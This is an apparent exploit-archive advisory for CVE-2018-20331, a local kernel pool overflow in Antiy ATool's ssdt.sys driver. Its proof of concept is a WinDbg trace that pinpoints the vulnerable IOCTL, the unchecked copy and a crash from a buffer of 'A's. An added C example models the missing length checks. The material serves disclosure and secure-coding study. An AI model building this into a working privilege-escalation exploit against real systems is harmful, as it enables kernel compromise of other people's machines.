# Exploit Title: Kernel Pool Buffer Overflow ATool - 1.0.0.22 (0day)
# CVE: CVE-2018-20331
# Date: 21-12-2018
# Software Link: http://www.antiy.net/
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.antiy.net/
# Category: Windows
# Attack Type: local
# Impact: Code execution/Denial of Service/Escalation of Privileges
1. Description
> Local attackers can trigger a Kernel Pool Buffer Overflow in Antiy AVL ATool
> v1.0.0.22. An attacker must first obtain the ability to execute
> low-privileged code on the target system in order to exploit this
> vulnerability. The specific flaw exists within the processing of IOCTL
> 0x80002004 by the ssdt.sys kernel driver. The bug is caused by failure to
> properly validate the length of the user-supplied data. An attacker can
> leverage this vulnerability to execute arbitrary code in the context
> of the kernel, which could lead to privilege escalation. A failed
> exploit could lead to denial of service.
2. Proof of Concept
0: kd> !drvobj ssdt 2
Driver object (87fe0f38) is for:
\Driver\ssdt
DriverEntry: aaa0b99e ssdt
DriverStartIo: 00000000
DriverUnload: aaa0b828 ssdt
AddDevice: 00000000
Dispatch routines:
[00] IRP_MJ_CREATE aaa0b686 ssdt+0x686
[01] IRP_MJ_CREATE_NAMED_PIPE 82b08da3 nt!IopInvalidDeviceRequest
[02] IRP_MJ_CLOSE aaa0b686 ssdt+0x686
[03] IRP_MJ_READ 82b08da3 nt!IopInvalidDeviceRequest
[04] IRP_MJ_WRITE 82b08da3 nt!IopInvalidDeviceRequest
[05] IRP_MJ_QUERY_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest
[06] IRP_MJ_SET_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest
[07] IRP_MJ_QUERY_EA 82b08da3 nt!IopInvalidDeviceRequest
[08] IRP_MJ_SET_EA 82b08da3 nt!IopInvalidDeviceRequest
[09] IRP_MJ_FLUSH_BUFFERS 82b08da3 nt!IopInvalidDeviceRequest
[0a] IRP_MJ_QUERY_VOLUME_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest
[0b] IRP_MJ_SET_VOLUME_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest
[0c] IRP_MJ_DIRECTORY_CONTROL 82b08da3 nt!IopInvalidDeviceRequest
[0d] IRP_MJ_FILE_SYSTEM_CONTROL 82b08da3 nt!IopInvalidDeviceRequest
[0e] IRP_MJ_DEVICE_CONTROL aaa0b6c8 ssdt+0x6c8 <======================= Dispatch Function
[0f] IRP_MJ_INTERNAL_DEVICE_CONTROL 82b08da3 nt!IopInvalidDeviceRequest
[10] IRP_MJ_SHUTDOWN 82b08da3 nt!IopInvalidDeviceRequest
[11] IRP_MJ_LOCK_CONTROL 82b08da3 nt!IopInvalidDeviceRequest
[12] IRP_MJ_CLEANUP 82b08da3 nt!IopInvalidDeviceRequest
[13] IRP_MJ_CREATE_MAILSLOT 82b08da3 nt!IopInvalidDeviceRequest
[14] IRP_MJ_QUERY_SECURITY 82b08da3 nt!IopInvalidDeviceRequest
[15] IRP_MJ_SET_SECURITY 82b08da3 nt!IopInvalidDeviceRequest
[16] IRP_MJ_POWER 82b08da3 nt!IopInvalidDeviceRequest
[17] IRP_MJ_SYSTEM_CONTROL 82b08da3 nt!IopInvalidDeviceRequest
[18] IRP_MJ_DEVICE_CHANGE 82b08da3 nt!IopInvalidDeviceRequest
[19] IRP_MJ_QUERY_QUOTA 82b08da3 nt!IopInvalidDeviceRequest
[1a] IRP_MJ_SET_QUOTA 82b08da3 nt!IopInvalidDeviceRequest
[1b] IRP_MJ_PNP 82b08da3 nt!IopInvalidDeviceRequest
0: kd> bp aaa0b6c8
0: kd> g
Breakpoint 0 hit
ssdt+0x6c8:
aaa0b6c8 8bff mov edi,edi
0: kd> dd edi
87d6d238 00800005 86c620c8 00000000 00000000
87d6d248 00000000 00000000 00000000 00000000
87d6d258 00000000 00000000 00000000 00040002
87d6d268 00000000 00000000 00000000 00000000
87d6d278 00000000 00000001 00000000 00040001
87d6d288 00000000 87d6d28c 87d6d28c 00040000
87d6d298 00000000 87d6d29c 87d6d29c 00000000
87d6d2a8 00000000 87d6d2ac 87d6d2ac 00000000
0: kd> u eip L20
ssdt+0x6c8:
aaa0b6c8 8bff mov edi,edi
aaa0b6ca 55 push ebp
aaa0b6cb 8bec mov ebp,esp
aaa0b6cd 83ec0c sub esp,0Ch
aaa0b6d0 53 push ebx
aaa0b6d1 8b5d0c mov ebx,dword ptr [ebp+0Ch]
aaa0b6d4 8b4360 mov eax,dword ptr [ebx+60h]
aaa0b6d7 56 push esi
aaa0b6d8 33f6 xor esi,esi
aaa0b6da 89731c mov dword ptr [ebx+1Ch],esi
aaa0b6dd 8b5004 mov edx,dword ptr [eax+4]
aaa0b6e0 8b4808 mov ecx,dword ptr [eax+8]
aaa0b6e3 8b400c mov eax,dword ptr [eax+0Ch]
aaa0b6e6 3d00200080 cmp eax,80002000h
aaa0b6eb 57 push edi
aaa0b6ec 8b7b0c mov edi,dword ptr [ebx+0Ch]
aaa0b6ef 8955fc mov dword ptr [ebp-4],edx
aaa0b6f2 0f84d7000000 je ssdt+0x7cf (aaa0b7cf)
aaa0b6f8 3d04200080 cmp eax,80002004h <======================== Vulnerable IOCTL
aaa0b6fd 7442 je ssdt+0x741 (aaa0b741)
aaa0b6ff 3d08200080 cmp eax,80002008h
aaa0b704 7531 jne ssdt+0x737 (aaa0b737)
aaa0b706 8b37 mov esi,dword ptr [edi]
aaa0b708 56 push esi
aaa0b709 68a4b6a0aa push offset ssdt+0x6a4 (aaa0b6a4)
aaa0b70e e873fdffff call ssdt+0x486 (aaa0b486)
aaa0b713 a10cb5a0aa mov eax,dword ptr [ssdt+0x50c (aaa0b50c)]
aaa0b718 3b7008 cmp esi,dword ptr [eax+8]
aaa0b71b 59 pop ecx
aaa0b71c 59 pop ecx
aaa0b71d 7714 ja ssdt+0x733 (aaa0b733)
aaa0b71f 8b00 mov eax,dword ptr [eax]
0: kd> u . L40
ssdt+0x6f8:
aaa0b6f8 3d04200080 cmp eax,80002004h
aaa0b6fd 7442 je ssdt+0x741 (aaa0b741)
aaa0b6ff 3d08200080 cmp eax,80002008h
aaa0b704 7531 jne ssdt+0x737 (aaa0b737)
aaa0b706 8b37 mov esi,dword ptr [edi]
aaa0b708 56 push esi
aaa0b709 68a4b6a0aa push offset ssdt+0x6a4 (aaa0b6a4)
aaa0b70e e873fdffff call ssdt+0x486 (aaa0b486)
aaa0b713 a10cb5a0aa mov eax,dword ptr [ssdt+0x50c (aaa0b50c)]
aaa0b718 3b7008 cmp esi,dword ptr [eax+8]
aaa0b71b 59 pop ecx
aaa0b71c 59 pop ecx
aaa0b71d 7714 ja ssdt+0x733 (aaa0b733)
aaa0b71f 8b00 mov eax,dword ptr [eax]
aaa0b721 8b04b0 mov eax,dword ptr [eax+esi*4]
aaa0b724 8907 mov dword ptr [edi],eax
aaa0b726 8b45fc mov eax,dword ptr [ebp-4]
aaa0b729 89431c mov dword ptr [ebx+1Ch],eax
aaa0b72c 33f6 xor esi,esi
aaa0b72e e9ad000000 jmp ssdt+0x7e0 (aaa0b7e0)
aaa0b733 83631c00 and dword ptr [ebx+1Ch],0
aaa0b737 be0d0000c0 mov esi,0C000000Dh
aaa0b73c e99f000000 jmp ssdt+0x7e0 (aaa0b7e0)
aaa0b741 6844646b20 push 206B6444h <======================= Pooltag
aaa0b746 c1e902 shr ecx,2
aaa0b749 52 push edx
aaa0b74a 8bf1 mov esi,ecx
aaa0b74c 6a00 push 0 <==================================Pool type
aaa0b74e
1: kd> u . L20
ssdt+0x782:
aaa0b782 8911 mov dword ptr [ecx],edx
aaa0b784 83c104 add ecx,4
aaa0b787 ff4df8 dec dword ptr [ebp-8]
aaa0b78a 75e5 jne ssdt+0x771 (aaa0b771)
aaa0b78c 8b75f4 mov esi,dword ptr [ebp-0Ch]
aaa0b78f 8b0d0cb5a0aa mov ecx,dword ptr [ssdt+0x50c (aaa0b50c)]
aaa0b795 3b7108 cmp esi,dword ptr [ecx+8]
aaa0b798 7316 jae ssdt+0x7b0 (aaa0b7b0)
aaa0b79a 8bd6 mov edx,esi
aaa0b79c 8b09 mov ecx,dword ptr [ecx]
aaa0b79e 8b0c91 mov ecx,dword ptr [ecx+edx*4]
aaa0b7a1 890c90 mov dword ptr [eax+edx*4],ecx
aaa0b7a4 8b0d0cb5a0aa mov ecx,dword ptr [ssdt+0x50c (aaa0b50c)]
aaa0b7aa 42 inc edx
aaa0b7ab 3b5108 cmp edx,dword ptr [ecx+8]
aaa0b7ae 72ec jb ssdt+0x79c (aaa0b79c)
aaa0b7b0 8b4dfc mov ecx,dword ptr [ebp-4]
aaa0b7b3 8bd1 mov edx,ecx
aaa0b7b5 c1e902 shr ecx,2
aaa0b7b8 8bf0 mov esi,eax
aaa0b7ba f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
aaa0b7bc 8bca mov ecx,edx
aaa0b7be 83e103 and ecx,3
aaa0b7c1 50 push eax
aaa0b7c2 f3a4 rep movs byte ptr es:[edi],byte ptr [esi] <======================= Vulnerable copy
1: kd> dc edi
85a6ce00 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA <================ Evil user input
85a6ce10 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
85a6ce20 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
85a6ce30 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
85a6ce40 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
85a6ce50 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
85a6ce60 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
85a6ce70 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
1: kd> g
*** Fatal System Error: 0x00000019
(0x00000020,0x892CF250,0x892CF260,0x08020012)
Break instruction exception - code 80000003 (first chance)
A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.
A fatal system error has occurred.
1: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: 892cf250, The pool entry we were looking for within the page.
Arg3: 892cf260, The next pool entry.
Arg4: 08020012, (reserved
3. Solution:
None
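
Added example (not part of the original advisory and not the driver's code): a user-mode C model of the length checks a METHOD_BUFFERED IOCTL handler needs before it allocates or copies, which is the validation the description says is missing. handle_table_ioctl, its table semantics and the sample values in main are hypothetical; the macros decode the standard CTL_CODE fields.

```c
/* Added example: user-mode model of a METHOD_BUFFERED IOCTL handler.
   handle_table_ioctl, the table and its semantics are hypothetical. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define STATUS_SUCCESS                0x00000000u
#define STATUS_INVALID_PARAMETER      0xC000000Du
#define STATUS_BUFFER_TOO_SMALL       0xC0000023u
#define STATUS_INSUFFICIENT_RESOURCES 0xC000009Au

/* CTL_CODE layout: DeviceType<<16 | Access<<14 | Function<<2 | Method */
#define IOCTL_DEVTYPE(c)  ((uint32_t)(c) >> 16)
#define IOCTL_ACCESS(c)   (((uint32_t)(c) >> 14) & 3u)
#define IOCTL_FUNCTION(c) (((uint32_t)(c) >> 2) & 0xFFFu)
#define IOCTL_METHOD(c)   ((uint32_t)(c) & 3u)

/* sysbuf models Irp->AssociatedIrp.SystemBuffer, which the I/O manager
   sizes to max(in_len, out_len) for METHOD_BUFFERED requests. */
uint32_t handle_table_ioctl(uint32_t code, void *sysbuf, uint32_t in_len,
                            uint32_t out_len, const uint32_t *table,
                            uint32_t count, uint32_t *info)
{
    *info = 0;
    if (IOCTL_METHOD(code) != 0 || sysbuf == NULL || count == 0 ||
        count > UINT32_MAX / sizeof(uint32_t))      /* checked multiply */
        return STATUS_INVALID_PARAMETER;
    uint32_t need = count * (uint32_t)sizeof(uint32_t);
    /* Check every caller length against `need` before allocating or copying. */
    if (in_len % sizeof(uint32_t) != 0 || in_len > need)
        return STATUS_INVALID_PARAMETER;
    if (out_len < need)
        return STATUS_BUFFER_TOO_SMALL;
    uint32_t *scratch = malloc(need);  /* kernel: pool allocation of `need` */
    if (scratch == NULL)
        return STATUS_INSUFFICIENT_RESOURCES;
    memcpy(scratch, table, need);      /* driver-owned data */
    memcpy(scratch, sysbuf, in_len);   /* caller data, bounded by need */
    memcpy(sysbuf, scratch, need);     /* reply, bounded by out_len check */
    free(scratch);
    *info = need;                      /* models IoStatus.Information */
    return STATUS_SUCCESS;
}

int main(void) {
    uint32_t table[4] = {1, 2, 3, 4}, buf[4] = {0xAA, 0, 0, 0}, info;
    return handle_table_ioctl(0x80002004u, buf, 4, 16, table, 4, &info) != 0;
}
```

With these macros, 0x80002004 decodes to device type 0x8000, function 0x801, METHOD_BUFFERED and FILE_ANY_ACCESS.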